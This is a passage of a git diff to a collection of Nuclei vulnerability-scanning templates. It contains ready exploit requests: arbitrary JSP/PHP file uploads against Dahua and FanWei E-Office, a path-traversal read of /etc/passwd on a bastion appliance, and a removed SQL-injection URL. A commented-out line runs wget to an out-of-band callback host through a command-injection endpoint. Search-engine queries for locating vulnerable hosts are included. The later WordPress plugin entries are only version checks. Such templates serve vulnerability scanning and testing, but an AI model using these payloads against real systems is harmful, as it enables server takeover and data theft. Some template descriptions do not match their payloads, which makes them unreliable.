Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - ".data.resourceUuid" internal: true matchers: - - type: word - words: - - '{{randstr}}' + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index b35ef84818..1cd783867f 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml @@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,36 +14,15 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - - "200" + - "nologin" - type: status status: - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml @@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml b/poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml new file mode 100644 index 0000000000..9437c65c82 --- /dev/null +++ b/poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml @@ -0,0 +1,59 @@ +id: geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e + +info: + name: > + GEO my WordPress <= 4.5.0.1 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1e65922a-3498-4946-8415-3d922e85e46a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/geo-my-wp/" + google-query: inurl:"/wp-content/plugins/geo-my-wp/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,geo-my-wp,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geo-my-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geo-my-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.5.0.1') \ No newline at end of file diff --git a/poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml b/poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml new file mode 100644 index 0000000000..9d75abbe7a --- /dev/null +++ b/poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml @@ -0,0 +1,59 @@ +id: wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e + +info: + name: > + WP Accessibility Helper <= 0.6.2.8 - Missing Authorization to Authenticated (Subscriber+) Limited Settings Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3beee75-0480-4504-a177-45f8cd32cf36?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-accessibility-helper/" + google-query: inurl:"/wp-content/plugins/wp-accessibility-helper/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-accessibility-helper,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-accessibility-helper/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-accessibility-helper" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.2.8') \ No newline at end of file diff --git a/poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml b/poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml new file mode 100644 index 0000000000..bb2b8bb468 --- /dev/null +++ b/poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml @@ -0,0 +1,59 @@ +id: wp-simple-firewall-2453dc94f5e62cf781881087cb516889 + +info: + name: > + Shield Security – Smart Bot Blocking & Intrusion Prevention Security <= 20.0.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f23e7274-45f6-46da-b4c8-2eaa1bd39257?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-simple-firewall/" + google-query: inurl:"/wp-content/plugins/wp-simple-firewall/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-simple-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-simple-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-simple-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 20.0.5') \ No newline at end of file diff --git a/poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml b/poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml new file mode 100644 index 0000000000..ff34f0d30e --- /dev/null +++ b/poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml @@ -0,0 +1,59 @@ +id: wp-table-builder-096fe66e1a6c03883512b366b27ff120 + +info: + name: > + WP Table Builder <= 1.5.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f41b8d18-4a20-4b99-b375-3fafb41030ee?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-table-builder/" + google-query: inurl:"/wp-content/plugins/wp-table-builder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-table-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-table-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-table-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.0') \ No newline at end of file diff --git a/poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml b/poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml new file mode 100644 index 0000000000..660ee1eda0 --- /dev/null +++ b/poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml @@ -0,0 +1,59 @@ +id: wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0 + +info: + name: > + WP Testimonial Widget <= 3.1 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/072b66dd-a5d3-46b5-92ec-9cc83b8ea8ef?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-testimonial-widget/" + google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-testimonial-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1') \ No newline at end of file diff --git a/poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml b/poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml new file mode 100644 index 0000000000..89a0c65078 --- /dev/null +++ b/poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml @@ -0,0 +1,59 @@ +id: wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11 + +info: + name: > + WP Testimonial Widget <= 3.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b11ccbbd-c909-4160-af36-8f0b50fb1285?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-testimonial-widget/" + google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-testimonial-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1') \ No newline at end of file diff --git a/poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml b/poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml new file mode 100644 index 0000000000..6ef91edba3 --- /dev/null +++ b/poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml @@ -0,0 +1,59 @@ +id: wp-todo-d321c83fc92b177a4feede0546be070b + +info: + name: > + WP To Do <= 1.3.0 - Authenticated (Admin+) Stored Cross-Site Scripting via Task Comments + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-todo/" + google-query: inurl:"/wp-content/plugins/wp-todo/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-todo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-todo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-todo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.0') \ No newline at end of file